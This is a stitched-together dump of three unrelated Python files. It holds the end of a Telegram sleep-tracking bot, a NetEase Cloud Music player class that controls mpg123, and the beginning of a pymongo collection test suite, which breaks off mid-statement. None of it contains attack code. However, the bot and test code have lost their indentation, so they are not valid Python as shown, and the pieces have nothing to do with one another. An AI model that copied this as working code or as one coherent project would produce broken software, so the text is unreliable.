uid = db_getuidbyname(expr[1:])
if not uid:
sendmsg(_('User not found.'), chatid, replyid)
return
elif 'reply_to_message' in msg:
uid = msg['reply_to_message']['from']['id']
elif expr == 'all' and chatid < 0:
uid = None
else:
uid = msg['from']['id']
if uid not in USER_CACHE:
sendmsg(_('Please first /subscribe.'), chatid, replyid)
return
if uid:
usertz = pytz.timezone(USER_CACHE[uid]['timezone'])
usertime = datetime.datetime.now(usertz)
lastseen = user_last_seen(USER_CACHE[uid])
if lastseen:
userseendelta = usertime - datetime.datetime.fromtimestamp(
lastseen, usertz)
else:
userseendelta = None
text = [_('%s: local time is %s (%s)') % (
getufname(USER_CACHE[uid]), usertime.strftime('%H:%M'),
USER_CACHE[uid]['timezone'])]
if USER_CACHE[uid]['subscribed']:
start, interval, complete = user_status_update(uid)
if uid != msg['from']['id'] and userseendelta:
ndelta = humanizetime.naturaldelta(userseendelta)
if ndelta in (_("a moment"), _("now")):
text.append(_('Online'))
else:
text.append(_('Last seen: %s ago') % ndelta)
cutstart, cutend = CFG['cutwindow']
cutmid = (cutstart + cutend) / 2
if start:
userstart = datetime.datetime.fromtimestamp(start, usertz)
if interval:
end = userstart + datetime.timedelta(seconds=interval)
# 0 3 6
# +===========+
# | ---+-----+--x
# ^start ^end ^now
# sure
# | ----+---x |
# ^start ^end+now
# we are not sure, so don't write the db
if interval and (complete or midnight_delta(end) > cutmid):
text.append(_('Last sleep: %s, %s→%s') % (
hour_minutes(interval, False),
userstart.strftime('%H:%M'), end.strftime('%H:%M')))
# | | | and is current user
# ^now
elif (uid == msg['from']['id'] and
cutstart < midnight_delta(usertime) < cutmid):
text.append(_('Go to sleep!'))
# | x | |
# ^start ^now
# ^s ^now
else:
text.append(_('Sleep: %s→💤') % userstart.strftime('%H:%M'))
else:
text.append(_('Not enough data.'))
else:
text.append(_('Not subscribed.'))
sendmsg('\n'.join(text), chatid, replyid)
else:
update_group_members(msg['chat'])
text = []
startsum = intrvsum = 0
validstartcount = validintervcount = 0
for uid, start, interval in group_status_update(msg['chat']):
if not start:
continue
dispname = getufname(USER_CACHE[uid])
usertz = pytz.timezone(USER_CACHE[uid]['timezone'])
userstart = datetime.datetime.fromtimestamp(start, usertz)
startsum += midnight_delta(userstart)
validstartcount += 1
if interval:
end = userstart + datetime.timedelta(seconds=interval)
text.append('%s: %s, %s→%s' % (dispname,
hour_minutes(interval, False),
userstart.strftime('%H:%M'), end.strftime('%H:%M')))
intrvsum += interval
validintervcount += 1
else:
text.append('%s: %s→💤' % (dispname, userstart.strftime('%H:%M')))
if validintervcount:
avgstart = startsum/validstartcount
avginterval = intrvsum/validintervcount
text.append(_('Average: %s, %s→%s') % (
hour_minutes(avginterval, False),
hour_minutes(midnight_adjust(avgstart)),
hour_minutes(midnight_adjust(avgstart + avginterval))))
sendmsg('\n'.join(text) or _('Not enough data.'), chatid, replyid)
def user_average_sleep(usertz, iterable):
startsum = intrvsum = 0
count = 0
for start, duration in iterable:
userstart = datetime.datetime.fromtimestamp(start, usertz)
startsum += midnight_delta(userstart)
intrvsum += duration
count += 1
if count:
avgstart = startsum/count
avginterval = intrvsum/count
return (avgstart, avginterval)
else:
return (None, None)
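# Illustrative sketch (not part of the original source): feeding synthetic
# (start_timestamp, duration) rows through user_average_sleep(). The averaged
# start is an offset from local midnight, so convert it back with
# midnight_adjust() before formatting.
def _demo_user_average_sleep():
    base = pytz.utc.localize(datetime.datetime(2016, 1, 1, 23, 0)).timestamp()
    rows = [(base, 8 * 3600), (base + 86400 + 3600, 7 * 3600)]  # 23:00 / 00:00 starts
    avgstart, avginterval = user_average_sleep(pytz.utc, rows)
    return hour_minutes(midnight_adjust(avgstart)), hour_minutes(avginterval)  # '23:30', '07:30'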
def group_average_sleep(uid=None, fulllist=False):
_self_cache = group_average_sleep.cache
_cache_ttl = 600
if fulllist:
stats = []
else:
try:
timestamp, avgstart, avginterval = _self_cache[uid]
if time.time() - timestamp < _cache_ttl:
return avgstart, avginterval
except KeyError:
pass
startsum = intrvsum = 0
count = 0
if uid:
result = CONN.execute(
'SELECT sleep.user, sleep.time, sleep.duration FROM sleep'
' INNER JOIN users ON sleep.user = users.id'
' INNER JOIN user_chats ON sleep.user = user_chats.user'
' WHERE user_chats.chat = ? AND users.subscribed = 1'
' ORDER BY sleep.user', (uid,))
else:
result = CONN.execute(
'SELECT sleep.user, sleep.time, sleep.duration FROM sleep'
' INNER JOIN users ON sleep.user = users.id'
' WHERE users.subscribed = 1 ORDER BY sleep.user')
for user, group in itertools.groupby(result, key=operator.itemgetter(0)):
usertz = pytz.timezone(USER_CACHE[user]['timezone'])
avgstart, avginterval = user_average_sleep(usertz,
map(operator.itemgetter(1, 2), group))
if fulllist:
stats.append((avginterval, avgstart, getufname(USER_CACHE[user])))
count += 1
startsum += avgstart
intrvsum += avginterval
avgstart = avginterval = None
if count:
avgstart = startsum/count
avginterval = intrvsum/count
if fulllist:
return stats, avgstart, avginterval
else:
_self_cache[uid] = (time.time(), avgstart, avginterval)
return avgstart, avginterval
group_average_sleep.cache = {}
def cmd_average(expr, chatid, replyid, msg):
'''/average - List statistics about sleep time'''
if expr == 'all' and chatid < 0:
uid = None
else:
uid = msg['from']['id']
if uid not in USER_CACHE:
sendmsg(_('Please first /subscribe.'), chatid, replyid)
return
text = []
if uid:
usertz = pytz.timezone(USER_CACHE[uid]['timezone'])
avgstart, avginterval = user_average_sleep(usertz, CONN.execute(
'SELECT time, duration FROM sleep WHERE user = ?', (uid,)))
if avgstart is not None:
text.append(_('Average: %s, %s→%s') % (hour_minutes(avginterval, False),
hour_minutes(midnight_adjust(avgstart)),
hour_minutes(midnight_adjust(avgstart + avginterval))))
else:
text.append(_('Not enough data.'))
if chatid > 0:
avgstart, avginterval = group_average_sleep(None)
if avgstart and avginterval:
text.append(_('Global average: %s, %s→%s') % (
hour_minutes(avginterval, False),
hour_minutes(midnight_adjust(avgstart)),
hour_minutes(midnight_adjust(avgstart + avginterval))))
else:
avgstart, avginterval = group_average_sleep(msg['chat']['id'])
if avgstart and avginterval:
text.append(_('Group average: %s, %s→%s') % (
hour_minutes(avginterval, False),
hour_minutes(midnight_adjust(avgstart)),
hour_minutes(midnight_adjust(avgstart + avginterval))))
else:
update_group_members(msg['chat'])
uid = msg['chat']['id']
stats, avgstart, avginterval = group_average_sleep(uid, True)
if stats:
stats.sort(key=lambda x: (-x[0], x[1], x[2]))
for interval, start, dispname in stats:
text.append('%s: %s, %s→%s' % (dispname,
hour_minutes(interval, False),
hour_minutes(midnight_adjust(start)),
hour_minutes(midnight_adjust(start + interval))))
text.append(_('Group average: %s, %s→%s') % (
hour_minutes(avginterval, False),
hour_minutes(midnight_adjust(avgstart)),
hour_minutes(midnight_adjust(avgstart + avginterval))))
else:
text.append(_('Not enough data.'))
sendmsg('\n'.join(text), chatid, replyid)
def cmd_subscribe(expr, chatid, replyid, msg):
'''/subscribe - Add you to the watchlist'''
update_user(msg['from'], True)
sendmsg(_("%s, you are subscribed.") % getufname(msg['from']), chatid, replyid)
def cmd_unsubscribe(expr, chatid, replyid, msg):
'''/unsubscribe - Remove you from the watchlist'''
update_user(msg['from'], False)
sendmsg(_("%s, you are unsubscribed.") % getufname(msg['from']), chatid, replyid)
def cmd_settz(expr, chatid, replyid, msg):
'''/settz - Set your timezone'''
if expr and expr in pytz.all_timezones_set:
update_user(msg['from'], timezone=expr)
sendmsg(_("Your timezone is %s now.") % expr, chatid, replyid)
else:
try:
current = USER_CACHE[msg['from']['id']]['timezone']
except KeyError:
current = CFG['defaulttz']
sendmsg(_("Invalid timezone. Your current timezone is %s.") % current, chatid, replyid)
def cmd_time(expr, chatid, replyid, msg):
'''/time - Get time for various timezones'''
tzs = list(filter(lambda x: x in pytz.all_timezones_set, expr.split()))
if not tzs:
if chatid > 0:
tzs = [USER_CACHE[msg['from']['id']]['timezone']]
else:
tzs = [row[0] for row in CONN.execute(
'SELECT users.timezone FROM users'
' INNER JOIN user_chats ON users.id = user_chats.user'
' WHERE user_chats.chat = ? GROUP BY users.timezone'
' ORDER BY count(users.timezone) DESC, users.timezone ASC',
(msg['chat']['id'],))]
if tzs:
text = [_('The time is:')]
for tz in tzs:
usertime = datetime.datetime.now(pytz.timezone(tz))
text.append(' '.join((
'🌞' if tz_is_day(usertime, tz) else '🌜',
usertime.strftime('%H:%M'), tz
)))
sendmsg('\n'.join(text), chatid, replyid)
else:
sendmsg(_("No timezone specified."), chatid, replyid)
def cmd_start(expr, chatid, replyid, msg):
if chatid > 0:
sendmsg(_("This is Trusted Sleep Bot. It can track users' sleep habit by using Telegram online status. Send me /help for help."), chatid, replyid)
def cmd_help(expr, chatid, replyid, msg):
'''/help - Show usage'''
if expr:
if expr in COMMANDS:
h = _(COMMANDS[expr].__doc__)
if h:
sendmsg(h, chatid, replyid)
else:
sendmsg(_('Help is not available for %s') % expr, chatid, replyid)
else:
sendmsg(_('Command not found.'), chatid, replyid)
else:
sendmsg('\n'.join(_(cmd.__doc__) for cmdname, cmd in COMMANDS.items() if cmd.__doc__), chatid, replyid)
def getufname(user, maxlen=100):
name = user['first_name'] or ''
if user.get('last_name'):
name += ' ' + user['last_name']
if len(name) > maxlen:
name = name[:maxlen] + '…'
return name
def load_config():
return AttrDict(json.load(open('config.json', encoding='utf-8')))
def save_config():
json.dump(CFG, open('config.json', 'w'), sort_keys=True, indent=1)
DB.commit()
def handle_update(obj):
if "update_id" in obj:
handle_api_update(obj)
else:
handle_tg_update(obj)
def sig_exit(signum, frame):
save_config()
TGCLI.close()
logging.info('Exited upon signal %s' % signum)
# should document usage in docstrings
COMMANDS = collections.OrderedDict((
('status', cmd_status),
('average', cmd_average),
('settz', cmd_settz),
('time', cmd_time),
('subscribe', cmd_subscribe),
('unsubscribe', cmd_unsubscribe),
('help', cmd_help),
('start', cmd_start)
))
if __name__ == '__main__':
CFG = load_config()
translation = gettext.translation('tsleepd', os.path.join(
os.path.dirname(os.path.abspath(os.path.realpath(sys.argv[0] or 'locale'))),
'locale'), CFG['languages'])
translation.install(('ngettext',))
DB, CONN = None, None
MSG_Q = queue.Queue()
USER_CACHE = {}
TGCLI = tgcli.TelegramCliInterface(CFG.tgclibin)
TGCLI.ready.wait()
TGCLI.on_json = MSG_Q.put
signal.signal(signal.SIGTERM, sig_exit)
try:
USER_CACHE = init_db()
all_status_update()
updatebotinfo()
apithr = threading.Thread(target=getupdates)
apithr.daemon = True
apithr.start()
while 1:
handle_update(MSG_Q.get())
finally:
save_config()
TGCLI.close()
|
player.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
NetEase Cloud Music (网易云音乐) Player
"""
# Let's make some noise
from __future__ import print_function, unicode_literals, division, absolute_import
import subprocess
import threading
import time
import os
import random
from future.builtins import str
# from ui import Ui
from storage import Storage
from api import NetEase
from cache import Cache
from config import Config
from utils import notify
import logger
log = logger.getLogger(__name__)
class Player(object):
MODE_ORDERED = 0
MODE_ORDERED_LOOP = 1
MODE_SINGLE_LOOP = 2
MODE_RANDOM = 3
MODE_RANDOM_LOOP = 4
def __init__(self):
self.config = Config()
# self.ui = Ui()
self.popen_handler = None
# flag stop, prevent thread start
self.playing_flag = False
        self.refresh_url_flag = False
self.process_length = 0
self.process_location = 0
self.storage = Storage()
self.cache = Cache()
self.end_callback = None
self.playing_song_changed_callback = None
self.api = NetEase()
@property
def info(self):
return self.storage.database["player_info"]
@property
def songs(self):
return self.storage.database["songs"]
@property
def index(self):
return self.info["idx"]
@property
def list(self):
return self.info["player_list"]
@property
def order(self):
return self.info["playing_order"]
@property
def mode(self):
return self.info["playing_mode"]
@property
def is_ordered_mode(self):
return self.mode == Player.MODE_ORDERED
@property
def is_ordered_loop_mode(self):
return self.mode == Player.MODE_ORDERED_LOOP
@property
def is_single_loop_mode(self):
return self.mode == Player.MODE_SINGLE_LOOP
@property
def is_random_mode(self):
return self.mode == Player.MODE_RANDOM
@property
def is_random_loop_mode(self):
return self.mode == Player.MODE_RANDOM_LOOP
@property
def config_notifier(self):
return self.config.get("notifier")
@property
def config_mpg123(self):
return self.config.get("mpg123_parameters")
@property
def current_song(self):
if not self.songs:
return {}
if not self.is_index_valid:
return {}
song_id = self.list[self.index]
return self.songs.get(song_id, {})
@property
def playing_id(self):
return self.current_song["song_id"]
@property
def playing_name(self):
return self.current_song["song_name"]
@property
def is_empty(self):
return len(self.list) == 0
@property
def is_index_valid(self):
return 0 <= self.index < len(self.list)
def notify_playing(self):
if not self.current_song:
return
if not self.config_notifier:
return
song = self.current_song
        notify(
            # "Now playing: <song>\n<artist>-<album>"
            "正在播放: {}\n{}-{}".format(
                song["song_name"], song["artist"], song["album_name"]
            )
        )
def notify_copyright_issue(self):
log.warning(
"Song {} is unavailable due to copyright issue.".format(self.playing_id)
)
        notify("版权限制,无法播放此歌曲")  # "Restricted by copyright; this song cannot be played"
def change_mode(self, step=1):
self.info["playing_mode"] = (self.info["playing_mode"] + step) % 5
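    # Illustrative note (not part of the original source): change_mode() cycles
    # through the five MODE_* constants, so five steps return to the starting
    # mode and a negative step walks backwards, e.g.
    #   p.change_mode()    # MODE_ORDERED (0) -> MODE_ORDERED_LOOP (1)
    #   p.change_mode(-2)  # MODE_ORDERED_LOOP (1) -> MODE_RANDOM_LOOP (4), mod 5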
def build_playinfo(self):
if not self.current_song:
return
# self.ui.build_playinfo(
# self.current_song["song_name"],
# self.current_song["artist"],
# self.current_song["album_name"],
# self.current_song["quality"],
# time.time(),
# pause=not self.playing_flag,
# )
def add_songs(self, songs):
for song in songs:
song_id = str(song["song_id"])
self.info["player_list"].append(song_id)
if song_id in self.songs:
self.songs[song_id].update(song)
else:
self.songs[song_id] = song
def refresh_urls(self):
songs = self.api.dig_info(self.list, "refresh_urls")
if songs:
for song in songs:
song_id = str(song["song_id"])
if song_id in self.songs:
self.songs[song_id]["mp3_url"] = song["mp3_url"]
self.songs[song_id]["expires"] = song["expires"]
self.songs[song_id]["get_time"] = song["get_time"]
else:
self.songs[song_id] = song
            self.refresh_url_flag = True
def stop(self):
if not self.popen_handler:
return
self.playing_flag = False
self.popen_handler.stdin.write(b"Q\n")
self.popen_handler.stdin.flush()
self.popen_handler.kill()
self.popen_handler = None
# wait process to be killed
time.sleep(0.01)
def tune_volume(self, up=0):
if not self.popen_handler:
return
new_volume = self.info["playing_volume"] + up
if new_volume > 100:
new_volume = 100
elif new_volume < 0:
new_volume = 0
self.info["playing_volume"] = new_volume
self.popen_handler.stdin.write(
"V {}\n".format(self.info["playing_volume"]).encode()
)
self.popen_handler.stdin.flush()
def switch(self):
if not self.popen_handler:
return
self.playing_flag = not self.playing_flag
self.popen_handler.stdin.write(b"P\n")
self.popen_handler.stdin.flush()
self.build_playinfo()
def run_mpg123(self, on_exit, url, expires=-1, get_time=-1):
para = ["mpg123", "-R"] + self.config_mpg123
self.popen_handler = subprocess.Popen(
para, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
self.tune_volume()
self.popen_handler.stdin.write(b"L " + url.encode("utf-8") + b"\n")
self.popen_handler.stdin.flush()
endless_loop_cnt = 0
while True:
if not self.popen_handler:
break
strout = self.popen_handler.stdout.readline().decode("utf-8").strip()
if strout[:2] == "@F":
# playing, update progress
out = strout.split(" ")
self.process_location = int(float(out[3]))
self.process_length = int(float(out[3]) + float(out[4]))
elif strout[:2] == "@E":
self.playing_flag = True
if (
expires >= 0
and get_time >= 0
and time.time() - expires - get_time >= 0
):
                    # the URL expired; fetch fresh ones
self.refresh_urls()
else:
# error, stop song and move to next
self.notify_copyright_issue()
break
elif strout == "@P 0":
# end, moving to next
self.playing_flag = True
break
elif strout == "":
endless_loop_cnt += 1
                # mpg123 sometimes keeps sending empty messages without
                # exiting after playback; bail out here to avoid an endless
                # loop and high CPU use
if endless_loop_cnt > 100:
log.warning(
"mpg123 error, halt, endless loop and high cpu use, then we kill it"
)
break
if self.playing_flag:
            if self.refresh_url_flag:
                self.stop()
                self.replay()
                self.refresh_url_flag = False
else:
self.next()
else:
self.stop()
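    # Illustrative notes (not part of the original source) on the mpg123 -R
    # remote-control protocol parsed above, matching the branches in
    # run_mpg123():
    #   @F <frame> <frames-left> <sec> <sec-left>  -> progress (sec fields are read)
    #   @E ...                                     -> error (expired URL or blocked song)
    #   @P 0                                       -> playback finished, move to next
    # Commands written to stdin: "L <url>" load, "P" pause/resume,
    # "V <volume>" set volume, "Q" quit (see stop(), switch(), tune_volume()).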
    def download_lyric(self, is_translated=False):
        key = "lyric" if not is_translated else "tlyric"
        if key not in self.songs[str(self.playing_id)]:
            self.songs[str(self.playing_id)][key] = []
        if len(self.songs[str(self.playing_id)][key]) > 0:
            return
        if not is_translated:
            lyric = self.api.song_lyric(self.playing_id)
        else:
            lyric = self.api.song_tlyric(self.playing_id)
self.songs[str(self.playing_id)][key] = lyric
def download_song(self, song_id, song_name, artist, url):
def write_path(song_id, path):
self.songs[str(song_id)]["cache"] = path
self.cache.add(song_id, song_name, artist, url, write_path)
self.cache.start_download()
def start_playing(self, on_exit, args):
"""
Runs the given args in subprocess.Popen, and then calls the function
on_exit when the subprocess completes.
on_exit is a callable object, and args is a lists/tuple of args
that would give to subprocess.Popen.
"""
# log.debug("%s,%s,%s" % (args['song_id'], args['song_name'], args['mp3_url']))
if "cache" in args.keys() and os.path.isfile(args["cache"]):
thread = threading.Thread(
target=self.run_mpg123, args=(on_exit, args["cache"])
)
else:
            new_url = NetEase().songs_url([args["song_id"]])[0]["url"]  # prefer a freshly fetched URL
            if not new_url:  # no new URL was returned
                new_url = args["mp3_url"]  # fall back to the stored URL for mpg123
thread = threading.Thread(
target=self.run_mpg123,
args=(on_exit, new_url, args["expires"], args["get_time"]),
)
cache_thread = threading.Thread(
target=self.download_song,
args=(
args["song_id"],
args["song_name"],
args["artist"],
args["mp3_url"],
),
)
cache_thread.start()
thread.start()
lyric_download_thread = threading.Thread(target=self.download_lyric)
lyric_download_thread.start()
tlyric_download_thread = threading.Thread(
target=self.download_lyric, args=(True,)
)
tlyric_download_thread.start()
# returns immediately after the thread starts
return thread
def replay(self):
if not self.is_index_valid:
self.stop()
if self.end_callback:
log.debug("Callback")
self.end_callback()
return
if not self.current_song:
return
self.stop()
self.playing_flag = True
self.build_playinfo()
self.notify_playing()
self.start_playing(lambda: 0, self.current_song)
def shuffle_order(self):
del self.order[:]
self.order.extend(list(range(0, len(self.list))))
random.shuffle(self.order)
self.info["random_index"] = 0
def new_player_list(self, type, title, datalist, offset):
self.info["player_list_type"] = type
self.info["player_list_title"] = title
# self.info['idx'] = offset
self.info["player_list"] = []
self.info["playing_order"] = []
self.info["random_index"] = 0
self.songs.clear()
self.add_songs(datalist)
def append_songs(self, datalist):
self.add_songs(datalist)
    # switch_flag is True when we are in the playlist view, or when the
    # current list type is not one of "songs", "djchannels", "fmsongs"
    def play_or_pause(self, idx, switch_flag):
        if self.is_empty:
            return
        # same "list index" and "playing index" --> same song :: pause/resume it
        if self.index == idx and switch_flag:
            if not self.popen_handler:
                self.stop()
                self.replay()
            else:
                self.switch()
        else:
            self.info["idx"] = idx
            self.stop()
            self.replay()
def _swap_song(self):
now_songs = self.order.index(self.index)
self.order[0], self.order[now_songs] = self.order[now_songs], self.order[0]
def _need_to_shuffle(self):
playing_order = self.order
random_index = self.info["random_index"]
if (
random_index >= len(playing_order)
or playing_order[random_index] != self.index
):
return True
else:
return False
def next_idx(self):
if not self.is_index_valid:
return self.stop()
playlist_len = len(self.list)
if self.mode == Player.MODE_ORDERED:
            # make sure self.index does not run past the end of the list
if self.info["idx"] < playlist_len:
self.info["idx"] += 1
elif self.mode == Player.MODE_ORDERED_LOOP:
self.info["idx"] = (self.index + 1) % playlist_len
elif self.mode == Player.MODE_SINGLE_LOOP:
            pass  # single-song loop: keep the current index
else:
playing_order_len = len(self.order)
if self._need_to_shuffle():
self.shuffle_order()
# When you regenerate playing list
# you should keep previous song same.
self._swap_song()
playing_order_len = len(self.order)
self.info["random_index"] += 1
# Out of border
if self.mode == Player.MODE_RANDOM_LOOP:
self.info["random_index"] %= playing_order_len
# Random but not loop, out of border, stop playing.
if self.info["random_index"] >= playing_order_len:
self.info["idx"] = playlist_len
else:
self.info["idx"] = self.order[self.info["random_index"]]
if self.playing_song_changed_callback is not None:
self.playing_song_changed_callback()
def next(self):
self.stop()
self.next_idx()
self.replay()
def prev_idx(self):
if not self.is_index_valid:
self.stop()
return
playlist_len = len(self.list)
if self.mode == Player.MODE_ORDERED:
if self.info["idx"] > 0:
self.info["idx"] -= 1
elif self.mode == Player.MODE_ORDERED_LOOP:
self.info["idx"] = (self.info["idx"] - 1) % playlist_len
elif self.mode == Player.MODE_SINGLE_LOOP:
            pass  # single-song loop: keep the current index
else:
playing_order_len = len(self.order)
if self._need_to_shuffle():
self.shuffle_order()
playing_order_len = len(self.order)
self.info["random_index"] -= 1
if self.info["random_index"] < 0:
if self.mode == Player.MODE_RANDOM:
self.info["random_index"] = 0
else:
self.info["random_index"] %= playing_order_len
self.info["idx"] = self.order[self.info["random_index"]]
if self.playing_song_changed_callback is not None:
self.playing_song_changed_callback()
def prev(self):
self.stop()
self.prev_idx()
self.replay()
def shuffle(self):
self.stop()
self.info["playing_mode"] = Player.MODE_RANDOM
self.shuffle_order()
self.info["idx"] = self.info["playing_order"][self.info["random_index"]]
self.replay()
def volume_up(self):
self.tune_volume(5)
def volume_down(self):
self.tune_volume(-5)
    def update_size(self):
        if getattr(self, "ui", None):  # self.ui is disabled (commented out) in __init__
            self.ui.update_size()
        self.build_playinfo()
def cache_song(self, song_id, song_name, artist, song_url):
def on_exit(song_id, path):
self.songs[str(song_id)]["cache"] = path
self.cache.enable = False
self.cache.enable = True
self.cache.add(song_id, song_name, artist, song_url, on_exit)
self.cache.start_download()
|
test_collection.py
|
# -*- coding: utf-8 -*-
# Copyright 2009-2015 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test the collection module."""
import contextlib
import re
import sys
import threading
from collections import defaultdict
sys.path[0:0] = [""]
import bson
from bson.raw_bson import RawBSONDocument
from bson.regex import Regex
from bson.code import Code
from bson.codec_options import CodecOptions
from bson.objectid import ObjectId
from bson.py3compat import itervalues
from bson.son import SON
from pymongo import (ASCENDING, DESCENDING, GEO2D,
GEOHAYSTACK, GEOSPHERE, HASHED, TEXT)
from pymongo import monitoring
from pymongo.bulk import BulkWriteError
from pymongo.collection import Collection, ReturnDocument
from pymongo.command_cursor import CommandCursor
from pymongo.cursor import CursorType
from pymongo.errors import (DocumentTooLarge,
DuplicateKeyError,
ExecutionTimeout,
InvalidDocument,
InvalidName,
InvalidOperation,
OperationFailure,
WriteConcernError)
from pymongo.message import _COMMAND_OVERHEAD, _gen_find_command
from pymongo.mongo_client import MongoClient
from pymongo.operations import *
from pymongo.read_preferences import ReadPreference
from pymongo.results import (InsertOneResult,
InsertManyResult,
UpdateResult,
DeleteResult)
from pymongo.write_concern import WriteConcern
from test.test_client import IntegrationTest
from test.utils import (is_mongos, enable_text_search, get_pool,
rs_or_single_client, single_client,
wait_until, EventListener,
IMPOSSIBLE_WRITE_CONCERN)
from test import client_context, unittest
class TestCollectionNoConnect(unittest.TestCase):
"""Test Collection features on a client that does not connect.
"""
@classmethod
def setUpClass(cls):
cls.db = MongoClient(connect=False).pymongo_test
def test_collection(self):
self.assertRaises(TypeError, Collection, self.db, 5)
def make_col(base, name):
return base[name]
self.assertRaises(InvalidName, make_col, self.db, "")
self.assertRaises(InvalidName, make_col, self.db, "te$t")
self.assertRaises(InvalidName, make_col, self.db, ".test")
self.assertRaises(InvalidName, make_col, self.db, "test.")
self.assertRaises(InvalidName, make_col, self.db, "tes..t")
self.assertRaises(InvalidName, make_col, self.db.test, "")
self.assertRaises(InvalidName, make_col, self.db.test, "te$t")
self.assertRaises(InvalidName, make_col, self.db.test, ".test")
self.assertRaises(InvalidName, make_col, self.db.test, "test.")
self.assertRaises(InvalidName, make_col, self.db.test, "tes..t")
self.assertRaises(InvalidName, make_col, self.db.test, "tes\x00t")
def test_getattr(self):
coll = self.db.test
self.assertTrue(isinstance(coll['_does_not_exist'], Collection))
with self.assertRaises(AttributeError) as context:
coll._does_not_exist
# Message should be:
# "AttributeError: Collection has no attribute '_does_not_exist'. To
# access the test._does_not_exist collection, use
# database['test._does_not_exist']."
self.assertIn("has no attribute '_does_not_exist'",
str(context.exception))
def test_iteration(self):
self.assertRaises(TypeError, next, self.db)
class TestCollection(IntegrationTest):
@classmethod
def setUpClass(cls):
super(TestCollection, cls).setUpClass()
cls.w = client_context.w
@classmethod
def tearDownClass(cls):
cls.db.drop_collection("test_large_limit")
@contextlib.contextmanager
def write_concern_collection(self):
if client_context.version.at_least(3, 3, 9) and client_context.is_rs:
with self.assertRaises(WriteConcernError):
# Unsatisfiable write concern.
yield Collection(
self.db, 'test',
write_concern=WriteConcern(w=len(client_context.nodes) + 1))
else:
yield self.db.test
def test_equality(self):
self.assertTrue(isinstance(self.db.test, Collection))
self.assertEqual(self.db.test, self.db["test"])
self.assertEqual(self.db.test, Collection(self.db, "test"))
self.assertEqual(self.db.test.mike, self.db["test.mike"])
self.assertEqual(self.db.test["mike"], self.db["test.mike"])
@client_context.require_version_min(3, 3, 9)
def test_create(self):
# No Exception.
db = client_context.client.pymongo_test
db.create_test_no_wc.drop()
Collection(db, name='create_test_no_wc', create=True)
with self.assertRaises(OperationFailure):
Collection(
db, name='create-test-wc',
write_concern=IMPOSSIBLE_WRITE_CONCERN,
create=True)
def test_drop_nonexistent_collection(self):
self.db.drop_collection('test')
self.assertFalse('test' in self.db.collection_names())
# No exception
self.db.drop_collection('test')
@client_context.require_version_min(2, 6)
def test_create_indexes(self):
db = self.db
self.assertRaises(TypeError, db.test.create_indexes, 'foo')
self.assertRaises(TypeError, db.test.create_indexes, ['foo'])
self.assertRaises(TypeError, IndexModel, 5)
self.assertRaises(ValueError, IndexModel, [])
db.test.drop_indexes()
db.test.insert_one({})
self.assertEqual(len(db.test.index_information()), 1)
db.test.create_indexes([IndexModel("hello")])
db.test.create_indexes([IndexModel([("hello", DESCENDING),
("world", ASCENDING)])])
# Tuple instead of list.
db.test.create_indexes([IndexModel((("world", ASCENDING),))])
self.assertEqual(len(db.test.index_information()), 4)
db.test.drop_indexes()
names = db.test.create_indexes([IndexModel([("hello", DESCENDING),
("world", ASCENDING)],
name="hello_world")])
self.assertEqual(names, ["hello_world"])
db.test.drop_indexes()
self.assertEqual(len(db.test.index_information()), 1)
db.test.create_indexes([IndexModel("hello")])
self.assertTrue("hello_1" in db.test.index_information())
db.test.drop_indexes()
self.assertEqual(len(db.test.index_information()), 1)
names = db.test.create_indexes([IndexModel([("hello", DESCENDING),
("world", ASCENDING)]),
IndexModel("hello")])
info = db.test.index_information()
for name in names:
self.assertTrue(name in info)
db.test.drop()
db.test.insert_one({'a': 1})
db.test.insert_one({'a': 1})
self.assertRaises(
DuplicateKeyError,
db.test.create_indexes,
[IndexModel('a', unique=True)])
with self.write_concern_collection() as coll:
coll.create_indexes([IndexModel('hello')])
def test_create_index(self):
db = self.db
self.assertRaises(TypeError, db.test.create_index, 5)
self.assertRaises(TypeError, db.test.create_index, {"hello": 1})
self.assertRaises(ValueError, db.test.create_index, [])
db.test.drop_indexes()
db.test.insert_one({})
self.assertEqual(len(db.test.index_information()), 1)
db.test.create_index("hello")
db.test.create_index([("hello", DESCENDING), ("world", ASCENDING)])
# Tuple instead of list.
db.test.create_index((("world", ASCENDING),))
self.assertEqual(len(db.test.index_information()), 4)
db.test.drop_indexes()
ix = db.test.create_index([("hello", DESCENDING),
("world", ASCENDING)], name="hello_world")
self.assertEqual(ix, "hello_world")
db.test.drop_indexes()
self.assertEqual(len(db.test.index_information()), 1)
db.test.create_index("hello")
self.assertTrue("hello_1" in db.test.index_information())
db.test.drop_indexes()
self.assertEqual(len(db.test.index_information()), 1)
db.test.create_index([("hello", DESCENDING), ("world", ASCENDING)])
self.assertTrue("hello_-1_world_1" in db.test.index_information())
db.test.drop()
db.test.insert_one({'a': 1})
db.test.insert_one({'a': 1})
self.assertRaises(
DuplicateKeyError, db.test.create_index, 'a', unique=True)
with self.write_concern_collection() as coll:
coll.create_index([('hello', DESCENDING)])
def test_drop_index(self):
db = self.db
db.test.drop_indexes()
db.test.create_index("hello")
name = db.test.create_index("goodbye")
self.assertEqual(len(db.test.index_information()), 3)
self.assertEqual(name, "goodbye_1")
db.test.drop_index(name)
# Drop it again.
with self.assertRaises(OperationFailure):
db.test.drop_index(name)
self.assertEqual(len(db.test.index_information()), 2)
self.assertTrue("hello_1" in db.test.index_information())
db.test.drop_indexes()
db.test.create_index("hello")
name = db.test.create_index("goodbye")
self.assertEqual(len(db.test.index_information()), 3)
self.assertEqual(name, "goodbye_1")
db.test.drop_index([("goodbye", ASCENDING)])
self.assertEqual(len(db.test.index_information()), 2)
self.assertTrue("hello_1" in db.test.index_information())
with self.write_concern_collection() as coll:
coll.drop_index('hello_1')
def test_reindex(self):
db = self.db
db.drop_collection("test")
db.test.insert_one({"foo": "bar", "who": "what", "when": "how"})
db.test.create_index("foo")
db.test.create_index("who")
db.test.create_index("when")
info = db.test.index_information()
def check_result(result):
self.assertEqual(4, result['nIndexes'])
indexes = result['indexes']
names = [idx['name'] for idx in indexes]
for name in names:
self.assertTrue(name in info)
for key in info:
self.assertTrue(key in names)
reindexed = db.test.reindex()
if 'raw' in reindexed:
